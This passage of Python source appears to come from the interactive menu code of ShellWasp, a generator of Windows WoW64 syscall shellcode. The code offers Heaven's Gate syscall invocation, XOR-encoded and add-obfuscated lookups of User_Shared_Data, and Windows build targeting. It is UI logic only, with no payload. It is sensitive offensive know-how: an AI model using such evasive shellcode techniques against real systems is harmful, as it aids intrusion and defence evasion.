togR=res+"["+gre+"X"+res+"]" togP=res+"["+gre+" "+res+"]" else: togR=res+"["+gre+" "+res+"]" togP=res+"["+gre+"X"+res+"]" text=" ShellWasp offers different ways to identify the OSBuild in WoW64 shellcode.\n If more than one is selected, it will try {} first and then {}. \n {} is default or used if others are not supported by OS.\n\n".format(gre+"r12_PEB"+res, gre+"User_Shared_Data"+res,gre+"fs_PEB"+res) text+=yel+" {}\t {} {} {} Uses {} to find PEB and identify OS Build\n".format(cya+"1"+res,mag+"fs_PEB" +res, togP, "-"+yel, cya+"fs:[0x30]"+yel) text+=red+"\t\t\tSupported:"+res+" Windows 7-11\n" text+=yel+" {}\t {} {} {} Uses {} and {} to find PEB and identify OS Build\n".format(cya+"2"+res,mag+"r12_PEB" +res, togR, "-"+yel, cya+"Heaven's Gate"+yel, cya+"r12"+yel) text+="\t\t\t "+res+"x64 code, "+cya+"mov ebx,dword ptr [r12]"+res+ ", gets"+cya+" TEB"+res+" from "+cya+"TEB64"+res+".\n"+res text+=red+"\t\t\tSupported:"+res+" Windows 7-11\n" text+=yel+" {}\t {} {} {} Uses {} to identify OS Build\n".format(cya+"3"+res,mag+"usd" +res, togSD, "-"+yel, cya+"User_Shared_Data"+yel, cya+"r12"+yel) text+=red+"\t\t\tSupported:"+res+" Windows 10-11\n" # text+="\t\t\t "+res+"Supported only on Win10/11.\n\n" text+=yel+" {}\t {} {} {} Encode {} to determine OS build with XOR key {}.{}\n".format(cya+"4"+res,mag+"encode" +res, togE,"-"+yel,cya+ "User_Shared_Data"+yel,cya+hex(sh.encodeUSDKey),res) text+=yel+" {}\t {} {} {} Change XOR key for encoding {}.\n".format(cya+"5"+res,mag+"xor" +res,togK,"-"+yel,cya+"User_Shared_Data"+res) text+=yel+" {}\t {} {} {} Get {} by adding {} to starting value, {}.{}\n".format(cya+"6"+res,mag+"add" +res, togA,"-"+yel,cya+ "User_Shared_Data"+yel,gre+hex(sh.addUSDVal)+yel,cya+hex(0x7ffe0260 -sh.addUSDVal) +yel,res) text+=yel+" {}\t {} {} {} Change value to add to get {}.{}\n\n".format(cya+"7"+res,mag+"add_val" +res, togAV,"-"+yel,cya+ "User_Shared_Data"+yel,res) text+=gre+" {} {} Show this submenu\n".format(cya+"h"+gre, res+"-"+gre) text+=gre+" {} {} Exit\n".format(cya+"x"+gre,res+"-"+gre) return text def selectFindOSBuild(): text=selectFindOSBuildText() print (text) userIN="" while userIN != "e" or userIN !="x": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp>"+ cya+"Style>" + mag + "OSBuild>" +res, end="") userIN = input() print(res) if userIN[0:1] == "1" or userIN[0:2] == "fs": sh.user12Teb=False sh.useSharedData=False print (" "+mag+"fs_PEB "+res+"is always on by default, but it can be overridden by other choices."+res) print (" "+mag+"r12_PEB"+res+" changed to: ", gre+str(sh.user12Teb)+res) print (" "+mag+"User_Shared_Data"+res+" changed to: ", gre+str(sh.useSharedData)+res) print ("\n Type {} or {} to exit".format(red+"x"+res, red+"q"+res)) elif userIN[0:1] == "2" or userIN[0:2].lower() == "fs".lower(): sh.user12Teb=True sh.useSharedData=False print (" "+mag+"r12_PEB"+res+" changed to: ", gre+str(sh.user12Teb)+res) print (" "+mag+"User_Shared_Data"+res+" changed to: ", gre+str(sh.useSharedData)+res) print ("\n Type {} or {} to exit".format(red+"x"+res, red+"q"+res)) elif userIN[0:1] == "3" or userIN[0:3] == "r12": sh.user12Teb=False sh.useSharedData=True print (" "+mag+"r12_PEB"+res+" changed to: ", gre+str(sh.user12Teb)+res) print (" "+mag+"User_Shared_Data"+res+" changed to: ", gre+str(sh.useSharedData)+res) print ("\n Type {} or {} to exit".format(red+"x"+res, red+"q"+res)) elif userIN[0:1] == "4" or userIN[0:6].lower() == "encode".lower(): if not sh.encodeUSD: sh.encodeUSD=True else: sh.encodeUSD=False print (" Encode User_Shared_Data: ", mag+str(sh.encodeUSD)+res) elif userIN[0:1] == "5" or userIN[0:3].lower() == "xor".lower(): hexInput=input(" Enter hexadecimal XOR key: ") try: sh.encodeUSDKey=int(hexInput,16) except: try: sh.encodeUSDKey=int("0x"+hexInput,16) except: print (red+" Unacceptable input."+res) print (" XOR key: " + mag+hex(sh.encodeUSDKey)+res) elif userIN[0:1] == "6" or userIN[0:3].lower() == "add".lower(): if not sh.addUSD: sh.addUSD=True else: sh.addUSD=False print (" Add User_Shared_Data: ", mag+str(sh.encodeUSD)+res) elif userIN[0:1] == "7" or userIN[0:7].lower() == "add_val".lower(): print(" ShellWasp gets the {} by adding two values to get {}.".format(cya+"User_Shared_Data"+res, cya+"0x7ffe0260"+res)) print(" Supply the value to be added; ShellWasp will calcuate the starting point.\n".format(cya+"User_Shared_Data"+res)) hexInput=input(" Enter hexadecimal add value: ") temp=0 try: temp=int(hexInput,16) if len(hex(temp))>10: print (" Input is too large.") elif temp>0x7ffe0260: print (" Select a value less than "+cya+"0x7ffe0260."+res) continue else: sh.addUSDVal=temp except: try: temp=int("0x"+hexInput,16) if len(hex(temp))>10: print (" Input is too large.") elif temp>0x7ffe0260: print (" Select a value less than "+cya+"0x7ffe0260."+res) continue else: sh.addUSDVal=temp except: print (red+" Unacceptable input."+res,temp ) text=" ShellWasp will add {} to {} to get {}\n".format(mag + hex(sh.addUSDVal)+res, mag + hex(0x7ffe0260-sh.addUSDVal)+res, cya+"User_Shared_Data"+res ) print(text) elif userIN[0:1] == "q" or userIN[0:1] == "x": break elif userIN[0:1] == "h": print(selectFindOSBuildText()) else: print(" Invalid input. Enter " + red + "x"+res+" to exit Style submenu.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") def selectSyscallStyle(): if sh.style=="x64": togX64=res+"["+gre+"X"+res+"]" togFs=res+"["+gre+" "+res+"]" togX=res+"["+gre+" "+res+"]" elif sh.style=="fs": togFs=res+"["+gre+"X"+res+"]" togX64=res+"["+gre+" "+res+"]" togX=res+"["+gre+" "+res+"]" elif sh.style=="x64Ex": togFs=res+"["+gre+" "+res+"]" togX64=res+"["+gre+" "+res+"]" togX=res+"["+gre+"X"+res+"]" text=" ShellWasp offers different ways to invoke the syscall for 32-bit, WoW64 shellcode:\n" text+=yel+" {}\t {} {} {} Uses {} to invoke syscall\n".format(cya+"1"+res,mag+"fs" +res, togFs, "-"+yel, cya+"fs:[0xc0]"+yel) text+=yel+" {}\t {} {} {} Uses Heaven's gate and executes {} to invoke syscall\n".format(cya+"2"+res,mag+"x64" +res, togX64,"-"+yel, cya+"x64 code"+yel) text+=yel+" {}\t {} {} {} Uses Heaven's gate and executes {} to invoke syscall\n".format(cya+"3"+res,mag+"x64Ex" +res, togX,"-"+yel, cya+"extended x64 code"+yel) text+=yel+" \t\t Win10/11 only\n".format(cya+""+res) # text+=gre+"\n Note:"+res+" The way in which the syscall is invoked differs based on OS. ShellWasp manages this\n\tbased on your selections of targeted OS builds.\n " print (text) userIN="" while userIN != "e" or userIN !="x": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp>"+ cya+"Style>" + mag + "Syscall>" +res, end="") userIN = input() print(res) if userIN[0:1] == "1" or userIN[0:2] == "fs": sh.style="fs" print (" Style changed to: ", mag+sh.style+res) print (" This method is most similar to what the OS does naturally with syscalls in WoW64."+res) break elif userIN[0:1] == "3" or userIN[0:5].lower() == "x64Ex".lower(): sh.style="x64Ex" print (" Style changed to: ", mag+sh.style+res) print (" This method uses {} to preserve and restore stack and CPU context (registers).".format(cya+"WOW64_CONTEXT"+res)) break elif userIN[0:1] == "2" or userIN[0:3] == "x64": sh.style="x64" print (" Style changed to: ", mag+sh.style+res) print (" This method uses {} to preserve and restore stack and CPU context (registers).".format(cya+"WOW64_CONTEXT"+res)) break elif userIN[0:1] == "q" or userIN[0:1] == "x": break else: print(" Invalid input. Enter " + red + "x"+res+" to exit Style submenu.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") def selectCompilerStyle(): if sh.intendedCompiler=="nasm": togN=res+"["+gre+"X"+res+"]" togV=res+"["+gre+" "+res+"]" elif sh.intendedCompiler=="inlineVS": togV=res+"["+gre+"X"+res+"]" togN=res+"["+gre+" "+res+"]" text=" When invoking the syscall via Heaven's gate and executing x64 code, there are different options\n on how to represent x64 code. Different formats are required based on compiler:\n" text+=yel+" {}\t {} {} {} Uses x64 bytes in the style of {} for compilers like {}\n".format(cya+"1"+res,mag+"nasm" +res, togN, "-"+yel,cya+"db 0xde,0xad,0xbe,0xef"+yel, cya+"NASM"+res) text+=yel+" {}\t {} {} {} Prepares x64 bytes for {} using the emit keyword:{}\n".format(cya+"2"+res,mag+"inlineVS" +res, togV,"-"+yel,cya+ "VisualStudio inline Assembly"+yel, cya+"\n\t\t_emit 0xde\n\t\t_emit 0xad\n\t\t_emit 0xbe\n\t\t_emit 0xef\n"+res) print (text) userIN="" while userIN != "e" or userIN !="x": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp>"+ cya+"Style>" + mag + "Format>" +res, end="") userIN = input() print(res) if userIN[0:1] == "1" or userIN[0:4] == "nasm": sh.intendedCompiler ="nasm" print (" Style changed to: ", mag+sh.intendedCompiler+res) break if userIN[0:1] == "2" or userIN[0:8].lower() == "inlineVS".lower(): sh.intendedCompiler ="inlineVS" print (" Style changed to: ", mag+sh.intendedCompiler+res) break if userIN[0:1] == "q" or userIN[0:1] == "x": break else: print(" Invalid input. Enter " + red + "x"+res+" to exit Style.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") def selectUserSharedOptions(): if sh.useSharedData: togU=res+"["+gre+"X"+res+"]" togF=res+"["+gre+" "+res+"]" else: togF=res+"["+gre+"X"+res+"]" togU=res+"["+gre+" "+res+"]" if sh.encodeUSD: togE=res+"["+gre+"X"+res+"]" else: togE=res+"["+gre+" "+res+"]" if sh.addUSD: togA=res+"["+gre+"X"+res+"]" else: togA=res+"["+gre+" "+res+"]" togK=res+"["+gre+hex(sh.encodeUSDKey)+res+"]" togAV=res+"["+gre+hex(sh.addUSDVal)+res+"]" togP=res+"["+gre+" "+res+"]" if sh.useSharedData: togSD=res+"["+gre+"X"+res+"]" else: togSD=res+"["+gre+" "+res+"]" if sh.user12Teb: togR=res+"["+gre+"X"+res+"]" togP=res+"["+gre+" "+res+"]" else: togR=res+"["+gre+" "+res+"]" togP=res+"["+gre+"X"+res+"]" text=" When targeting only "+cya+"Win10/11"+res+", the"+gre+" User_Shared_Data"+res+" or "+gre+"PEB"+res+" can determine OS build.\n" text+=yel+" {}\t {} {} {} Use the {} and {} to determine OS build.\n".format(cya+"1"+res,mag+"fs" +res, togF, "-"+yel,cya+"TEB"+yel, cya+"fs:[0x30]"+yel) text+=red+"\t\t\tSupported:"+res+" Windows 7-11\n" text+=yel+" {}\t {} {} {} Use {} to determine OS build.{}\n".format(cya+"2"+res,mag+"usd" +res, togU,"-"+yel,cya+ "User_Shared_Data"+yel,res) text+=red+"\t\t\tSupported:"+res+" Windows 10-11\n" text+=yel+" {}\t {} {} {} Encode {} to determine OS build with XOR key {}.{}\n".format(cya+"3"+res,mag+"encode" +res, togE,"-"+yel,cya+ "User_Shared_Data"+yel,cya+hex(sh.encodeUSDKey),res) text+=yel+" {}\t {} {} {} Change XOR key for encoding {}.\n".format(cya+"4"+res,mag+"xor" +res,togK,"-"+yel,cya+"User_Shared_Data"+res) text+=yel+" {}\t {} {} {} Get {} by adding {} to starting value, {}.{}\n".format(cya+"5"+res,mag+"add" +res, togA,"-"+yel,cya+ "User_Shared_Data"+yel,gre+hex(sh.addUSDVal)+yel,cya+hex(0x7ffe0260 -sh.addUSDVal) +yel,res) text+=yel+" {}\t {} {} {} Change value to add to get {}.{}\n".format(cya+"6"+res,mag+"add_val" +res, togAV,"-"+yel,cya+ "User_Shared_Data"+yel,res) text+=yel+" {}\t {} {} {} Show this submenu.{}\n".format(cya+"h"+res,mag+"display" +res, "","-"+res,res) text+=gre+"\n Note:"+res+" The User_Shared_Data on "+cya+"Win7"+res+" does"+mag+" not"+res+" contain the OS Build, so this can only\n be used if no Win7 OS builds are targeted. If selected, ShellWasp will use if allowable.\n" print (text) def selectUserShared(): selectUserSharedOptions() userIN="" while userIN != "e" or userIN !="x": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp>"+ cya+"Style>" + mag + "User_Shared_Data>" +res, end="") userIN = input() print(res) if userIN[0:1] == "1" or userIN[0:2] == "fs": sh.useSharedData=False print (" Use User_Shared_Data: ", mag+str(sh.useSharedData)+res) elif userIN[0:1] == "2" or userIN[0:16].lower() == "usd".lower() or userIN[0:3].lower() == "User".lower(): if sh.useSharedData==False: sh.useSharedData=True else: sh.useSharedData=False print (" Use User_Shared_Data: ", mag+str(sh.useSharedData)+res) elif userIN[0:1] == "3" or userIN[0:6].lower() == "encode".lower(): if not sh.encodeUSD: sh.encodeUSD=True else: sh.encodeUSD=False print (" Encode User_Shared_Data: ", mag+str(sh.encodeUSD)+res) elif userIN[0:1] == "4" or userIN[0:3].lower() == "xor".lower(): hexInput=input(" Enter hexadecimal XOR key: ") try: sh.encodeUSDKey=int(hexInput,16) except: try: sh.encodeUSDKey=int("0x"+hexInput,16) except: print (red+" Unacceptable input."+res) print (" XOR key: " + mag+hex(sh.encodeUSDKey)+res) elif userIN[0:1] == "5" or userIN[0:3].lower() == "add".lower(): if not sh.addUSD: sh.addUSD=True else: sh.addUSD=False print (" Add User_Shared_Data: ", mag+str(sh.encodeUSD)+res) elif userIN[0:1] == "6" or userIN[0:7].lower() == "add_val".lower(): print(" ShellWasp gets the {} by adding two values to get {}.".format(cya+"User_Shared_Data"+res, cya+"0x7ffe0260"+res)) print(" Supply the value to be added; ShellWasp will calcuate the starting point.\n".format(cya+"User_Shared_Data"+res)) hexInput=input(" Enter hexadecimal add value: ") temp=0 try: temp=int(hexInput,16) if len(hex(temp))>10: print (" Input is too large.") elif temp>0x7ffe0260: print (" Select a value less than "+cya+"0x7ffe0260."+res) continue else: sh.addUSDVal=temp except: try: temp=int("0x"+hexInput,16) if len(hex(temp))>10: print (" Input is too large.") elif temp>0x7ffe0260: print (" Select a value less than "+cya+"0x7ffe0260."+res) continue else: sh.addUSDVal=temp except: print (red+" Unacceptable input."+res,temp ) text=" ShellWasp will add {} to {} to get {}\n".format(mag + hex(sh.addUSDVal)+res, mag + hex(0x7ffe0260-sh.addUSDVal)+res, cya+"User_Shared_Data"+res ) print(text) elif userIN[0:1] == "q" or userIN[0:1] == "x": break elif userIN[0:1] == "h" or userIN[0:7] == "display": selectUserSharedOptions() else: print(" Invalid input. Enter " + red + "x"+res+" to exit Style.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") def uiSyscallStyle(): text = " {} {} {} {} \n".format(cya + "s"+res,"-",gre+"Change syscall style."+ res, "[" +mag+sh.style +res+"]") if sh.style=="x64": text+=yel+"\tThis choice invokes Heaven's gate and executes {} instead of {} \n".format(cya+"x64 code"+yel, cya+"fs:[0xc0]"+res) elif sh.style=="fs": text+=yel+"\tThis choice invokes the syscall with {}\n".format(cya+"fs:[0xc0]"+res) text += " {} {} {} {} \n".format(cya + "b"+res,"-",gre+"Change how x64 code is represented."+ res, "[" +mag+sh.intendedCompiler +res+"]") if sh.intendedCompiler=="nasm": text+=yel+"\tThis prepares x64 code in the style of {} - intended for compilers such as {} \n".format(cya+"db 0xde,0xad,0xbe,0xef"+yel, cya+"NASM"+res) elif sh.intendedCompiler=="inlineVS": text+=yel+"\tThis prepares x64 code for {} using emit, e.g. {}\n".format(cya+"VisualStudio inline Assembly"+yel,cya+"_emit 0xde"+res) text+=yel+"\tIf using x64 style, then we must transition from 32-bit to 64-bit code. {}\n".format(res) temp=[] if sh.useSharedData: temp.append("USD") if sh.user12Teb: temp.append("r12_PEB") else: temp.append("fs_PEB") if len(temp)==1: temp1=temp[0] else: temp1="" for each in temp: temp1+=cya+each+res+"," temp1=temp1[:-1] tempOut="[{}]".format(cya+temp1+res) # text += " {} {} {} {} \n".format(cya + "d"+res,"-",gre+"Use"+cya+" User_Shared_Data"+gre+" for Win10/11 to identify OS builds."+ res, togSD) text += " {} {} {} {} \n".format(cya + "o"+res,"-",gre+"Change how OSBuild is identified"+ res,tempOut) print (text) print(" Enter command to make changes. \n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"to exit Style submenu.\n") userIN="" while userIN != "e" or userIN !="x": #Loops on keyboard input try: #Will break the loop on entering x print(yel + " ShellWasp>"+ cya+"Style> " + res, end="") userIN = input() print(res) if userIN[0:1] == "x": break if userIN[0:1] == "q": break elif userIN[0:1] == "c" or userIN[0:1] == "s": selectSyscallStyle() elif userIN[0:1] == "o": selectFindOSBuild() elif userIN[0:1] == "b": selectCompilerStyle() elif userIN[0:1] == "h": # "find assembly instrucitons associated with shellcode" uiSyscallStyle() elif userIN[0:1] == "d": # "find assembly instrucitons associated with shellcode" # selectUserShared() selectFindOSBuild() else: print(" Invalid input. Enter " + red + "x"+res+" to exit Style.\n") except Exception as e: print (e) print(traceback.format_exc()) print ("exception") return while True: print (yel+ " ShellWasp>" + cya + "Style>" + res, end="") # x = sys.stdin.read() ans=[] for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break ans.append(line.rstrip()) # print(f'Input : {line}') # print (ans) for ch in ans: try: possible = builds.releaseOptions[ch] if possible not in sh.osChoices2: if possible != "21H3": sh.osChoices2.append(possible) winVersion=builds.winOSReverseLookup[possible] print ("\t"+cya+winVersion+": " + possible + " has been added.") else: print (red+"21H3 is not supported at this time."+res) except: print (red+ch+" was not accepted. Check spelling."+res) # sanitizeSyscalls() checkWinOSBools() break def uiAddWinReleases(): # self.win10ReverseLookup={"19044":"21h2, Win10", "19043":"21h1, Win10", "19042":"20h2, Win10", "19041":"2004, Win10", "18363":"1909, Win10", "18362":"1903, Win10", "17763":"1809, Win10", "17134":"1803, Win10", "16299":"1709, Win10", "15063":"1703, Win10", "14393":"1607, Win10", "10586":"1511, Win10", "10240":"1507"} checkWinOSBools() print (cya+"\nWindows 10:\t\t\t\tWindows 7:"+res) listWin10=["22h2", "21h2", "21h1", "20h2", "2004", "1909", "1903", "1809", "1803", "1709", "1703", "1607", "1511", "1507"] listWin10Back=["4A65", "4A64", "21h1", "20h2", "2004", "1909", "1903", "1809", "1803", "1709", "1703", "1607", "1511", "1507"] listWin11=["22h2","21h2"] listWin11Back=["585D", "55F0"] listWin7=["SP1", "SP0"] listWin7Back=["1DB1","1DB0"] listWin10Codes=["r14", "r13", "r12", "r11", "r10", "r9", "r8", "r7", "r6", "r5", "r4", "r3", "r2", "r1"] listWin7Codes=["sp1", "sp0"] listWin11Codes=["b2", "b1"] text="" t=0 stop=0 totalWin10=len(listWin10) remaining=totalWin10 for x in range(2): winlookUp=listWin10Back[t] if (builds.winOSBoolSelected[winlookUp]): t1="X" else: t1=" " winlookUp=listWin7Back[t] if (builds.winOSBoolSelected[winlookUp]): t2="X" else: t2=" " win10TogBool=res+"["+gre+t1+res+"]" win7TogBool=res+"["+gre+t2+res+"]" text += "\t{}\t{}\t{}\t\t\t{}\t{}\t{}\n".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, yel+listWin7Codes[t]+res, listWin7[t],win7TogBool) t+=1 for x in range(1): winlookUp=listWin10Back[t] if (builds.winOSBoolSelected[winlookUp]): t1="X" else: t1=" " win10TogBool=res+"["+gre+t1+res+"]" text += "\t{}\t{}\t{}\t\t{}\t\n".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, cya+"Windows 11:"+res) t+=1 w=0 for x in range(2): winlookUp=listWin10Back[t] if (builds.winOSBoolSelected[winlookUp]): t1="X" else: t1=" " winlookUp=listWin11Back[w] if (builds.winOSBoolSelected[winlookUp]): t2="X2" else: t2=" " win10TogBool=res+"["+gre+t1+res+"]" win11TogBool=res+"["+gre+t2+res+"]" text += "\t{}\t{}\t{}\t\t\t{}\t{}\t{}\n".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool, yel+listWin11Codes[w]+res, listWin11[w],win11TogBool) t+=1 w+=1 for x in range(9): winlookUp=listWin10Back[t] if (builds.winOSBoolSelected[winlookUp]): t1="X" else: t1=" " win10TogBool=res+"["+gre+t1+res+"]" text += "\t{}\t{}\t{}\t\t\t\n".format(yel+listWin10Codes[t]+res, listWin10[t],win10TogBool) t+=1 text += " {} \n".format(cya + "c"+res+" -"+yel+" Clear current selections."+ res) print (text) print(" This will add to existing Windows releases. \n") print(" Enter the above Windows release codes in yellow. Separate each release with a "+red+"newline"+res+".\n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"on a single line to end input.\n") while True: print (yel+ " ShellWasp>" + cya + "WinReleases>" + res+ red + "Input>" + res, end="") # x = sys.stdin.read() ans=[] for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break ans.append(line.rstrip()) # print(f'Input : {line}') # print (ans) for ch in ans: try: possible = builds.releaseOptions[ch] if possible not in sh.osChoices2: if possible != "21H3": sh.osChoices2.append(possible) winVersion=builds.winOSReverseLookup[possible] print ("\t"+cya+winVersion+": " + possible + " has been added.") else: print (red+"21H3 is not supported at this time."+res) except: print (red+ch+" was not accepted. Check spelling."+res) # sanitizeSyscalls() checkWinOSBools() break def uiAddSyscalls(): print(" This will add to existing syscalls present. Syscalls may be called more than once.\n") print(" Enter syscalls below. Selections are case insensitive. Separate each syscall with a "+red+"newline"+res+".\n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"on a single line to end input.\n") while True: print (yel+ " ShellWasp>" + cya + "Syscalls>" + res+ red + "Input>" + res, end="") # x = sys.stdin.read() ans=[] tempSys=[] tempSys.clear() for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break ans.append(line.rstrip()) tempSys.append(line.rstrip()) # tempSys.add(line.rstrip()) # print(f'Input : {line}') # print (ans) sh.list_of_syscalls.extend(ans) sanitizeSyscalls() tempSys2=sanitizeSyscallsAdded(tempSys) print (cya+"Syscalls added:") for each in tempSys2: print ("\t",each) break # print("Exit") def uiShowWinReleases(number=None): # self.win10ReverseLookup={"19044":"21h2, Win10", "19043":"21h1, Win10", "19042":"20h2, Win10", "19041":"2004, Win10", "18363":"1909, Win10", "18362":"1903, Win10", "17763":"1809, Win10", "17134":"1803, Win10", "16299":"1709, Win10", "15063":"1703, Win10", "14393":"1607, Win10", "10586":"1511, Win10", "10240":"1507"} # self.win10ReverseLookupHex={"4A64": "21h2", "4A63": "21h1", "4A62": "20h2", "4A61": "2004", "47BB": "1909", "47BA": "1903", "4563": "1809", "42EE": "1803", "3FAB": "1709", "3AD7": "1703", "3839": "1607", "295A": "1511", "2800": "1507"} # # Win11 21h2 build 22000 55F0 # self.win11ReverseLookupHex={"55F0":"21h2"} # self.win11ReverseLookup={"22000":"21h2, Win11"} # self.winOSReverseLookupHex={"4A64": "Windows 10", "4A63": "Windows 10", "4A62": "Windows 10", "4A61": "Windows 10", "47BB": "Windows 10", "47BA": "Windows 10", "4563": "Windows 10", "42EE": "Windows 10", "3FAB": "Windows 10", "3AD7": "Windows 10", "3839": "Windows 10", "295A": "Windows 10", "2800": "Windows 10", "55F0":"Windows 11", "1DB0":"Windows 7", "1DB1":"Windows 7", "4F7C":"Windows Server 2022"} # # Windows Server 2022 build 20348 4F7C # # Windows 7 Sp0 7600 1DB0 # # Windows 7 Sp1 7601 1DB1 # self.win7ReverseLookupHex={"1DB0":"SP0", "1DB1":"SP1"} # self.win7ReverseLookup={"7600":"Win7, Sp0", "7601":"Win7, Sp1"} # self.winServer22ReverseLookupHex={"4F7C":"20348, Windows Server 2022"} if number==None: print ("\tCurrent Windows release selections:") for osChoice in sh.osChoices2: winRelease="" winVersion=builds.winOSReverseLookup[osChoice] if winVersion=="Windows 10": winRelease=builds.win10ReverseLookupBackup[osChoice] elif winVersion=="Windows 7": winRelease=builds.win7ReverseLookupHex[osChoice] elif winVersion=="Windows 11": winRelease=builds.win11ReverseLookupHex[osChoice] print ("\t",gre +osChoice+res+"\t", winVersion,"\t",winRelease ) elif number=="edit": print ("\tCurrent Windows release selections:") t=0 for osChoice in sh.osChoices2: winRelease="" winVersion=builds.winOSReverseLookup[osChoice] if winVersion=="Windows 10": winRelease=builds.win10ReverseLookupBackup[osChoice] elif winVersion=="Windows 7": winRelease=builds.win7ReverseLookupHex[osChoice] elif winVersion=="Windows 11": winRelease=builds.win11ReverseLookupHex[osChoice] print ("\t",cya+str(t),"\t",gre +osChoice+res+"\t", winVersion,"\t",winRelease ) t+=1 def uiShowSyscalls(number=None): if number==None: print ("\tCurrent Syscall Selections:") for each in sh.list_of_syscalls: print ("\t",gre +each+res) elif number=="edit": print ("\tCurrent Syscall Selections:") t=0 for each in sh.list_of_syscalls: print ("\t",cya+str(t),"\t", gre +each+res) t+=1 def uiRearrangeSyscalls(): uiShowSyscalls("edit") print(" Enter desired order of syscalls to appear in the shellcode, one per line.\n") print(" Syscalls not listed are removed. Syscalls can be used more than once.\n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"on a single line to end input.\n") while True: print (yel+ " ShellWasp>" + cya + "Syscalls>" + res+ red + "Rearrange>" + res, end="") # x = sys.stdin.read() ans=[] for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break ans.append(int(line.rstrip())) # print(f'Input : {line}') # print (ans) temp= sh.list_of_syscalls.copy() sh.list_of_syscalls.clear() for new in ans: try: new=temp[new] sh.list_of_syscalls.append(new) except: print (red+"\t"+str(new)+" is not valid input."+res) print("\t"+cya+"Syscalls have been rearranged.\n"+res) uiShowSyscalls() break def uiEditWinReleases(): uiShowWinReleases("edit") print(" Enter the numbers corresponding to each Windows release to be removed, one per line.\n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"on a single line to end input.\n") while True: print (yel+ " ShellWasp>" + cya + "WinReleases>" + res+ red + "Edit>" + res, end="") # x = sys.stdin.read() ans=[] for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break try: ans.append(int(line.rstrip())) except: print(red+line.rstrip() + " is not an integer."+res) # print(traceback.format_exc()) # print(f'Input : {line}') # print (ans) # print(sh.osChoices2) temp= sh.osChoices2.copy() # print ("ans", ans) for removeMe in ans: try: destroy=temp[removeMe] sh.osChoices2.remove(destroy) print("\t"+cya+destroy+" has been removed."+res) except: print ("\t"+red+str(removeMe) +" is not valid input."+res) # print(traceback.format_exc()) # print (sh.osChoices2) break def uiEditSyscalls(): uiShowSyscalls("edit") print(" Enter the numbers corresponding to each syscall to be removed, one per line.\n") print(" Type"+red+ " q " +res+"or "+red+ " x " +res+"on a single line to end input.\n") while True: print (yel+ " ShellWasp>" + cya + "Syscalls>" + res+ red + "Edit>" + res, end="") # x = sys.stdin.read() ans=set() for line in sys.stdin: if 'q' == line.rstrip() or 'x' == line.rstrip(): break try: ans.add(int(line.rstrip())) except: print ("\n"+red+ line.rstrip()+" is not a valid integer."+res) # print(f'Input : {line}') # print (ans) temp= sh.list_of_syscalls.copy() for removeMe in ans: try: destroy=temp[removeMe] sh.list_of_syscalls.remove(destroy) print("\t"+cya+destroy + " has been removed."+res) except: try: print("\t"+red+removeMe + " is not valid input."+res) except: print("\t"+red+str(removeMe) + " is not valid input."+res) break def uiShowOptionsMainMenu(): text="\n" text += " {} \n".format(cya + "b"+res+" -"+gre+" Build syscall shellcode."+ res) text += " {} \n".format(cya + "B"+res+" -"+gre+" Build syscall shellcode (with sample values ("+yel+"new"+gre+")."+ res) text += " {} \n".format(cya + "A"+res+" -"+gre+" Build syscall shellcode (with sample values using AI ("+yel+"new"+gre+")."+ res) text += " {} \n".format(cya + "p"+res+" -"+gre+" Save current syscall shellcode to file."+ res) text += " {} \n".format(cya + "i"+res+" -"+gre+" Add or modify syscalls."+ res) text += " {} \n".format(cya + "w"+res+" -"+gre+" Add or modify Windows releases."+ res) text += " {} \n".format(cya + "s"+res+" -"+gre+" Syscall style configuration."+ res) text += " {} \n".format(cya + "c"+res+" -"+gre+" Save config file ["+res+"config.cfg"+gre+"] with current selections."+ res) text += " {} \n".format(cya + "h"+res+" -"+gre+" Display options."+ res) print (text) def uiShowOptionsSyscallSelections(): text="\n" text += " {} \n".format(cya + "c"+res+" -"+yel+" Clear current selections."+ res) text += " {} \n".format(cya + "a"+res+" -"+yel+" Add syscalls."+ res) text += " {} \n".format(cya + "s"+res+" -"+yel+" Show current syscalls."+ res) text += " {} \n".format(cya + "e"+res+" -"+yel+" Edit current syscalls."+ res) text += " {} \n".format(cya + "r"+res+" -"+yel+" Rearrange syscalls."+ res) print (text) def uiShowOptionsWinReleaseSelections(): text="\n" text += " {} \n".format(cya + "c"+res+" -"+yel+" Clear current selections."+ res) text += " {} \n".format(cya + "a"+res+" -"+yel+" Add Windows releases."+ res) text += " {} \n".format(cya + "s"+res+" -"+yel+" Show current Windows releases."+ res) text += " {} \n".format(cya + "e"+res+" -"+yel+" Edit current Windows releases."+ res) print (text) def giveInputWinReleases(): uiShowWinReleases() uiShowOptionsWinReleaseSelections() while True: print(yel+ " ShellWasp>" + cya + "WinReleases> "+ res, end="") techIN = input() if(techIN[0:1] == "x"): # print("Returning to find shellcode instructions menu.\n") break elif(techIN[0:1] == "a"): uiAddWinReleases() # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "c"): sh.osChoices2.clear() print ("\tList of Windows releases cleared.\n") # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "s"): uiShowWinReleases() # print("Returning to tech settings submenu.\n") elif(techIN[0:1] == "e"): uiEditWinReleases() elif(techIN[0:1] == "h"): uiShowOptionsWinReleaseSelections() else: print("Invalid input") def giveInput(): uiShowSyscalls() uiShowOptionsSyscallSelections() while True: print(yel+ " ShellWasp>" + cya + "Syscalls> "+ res, end="") techIN = input() 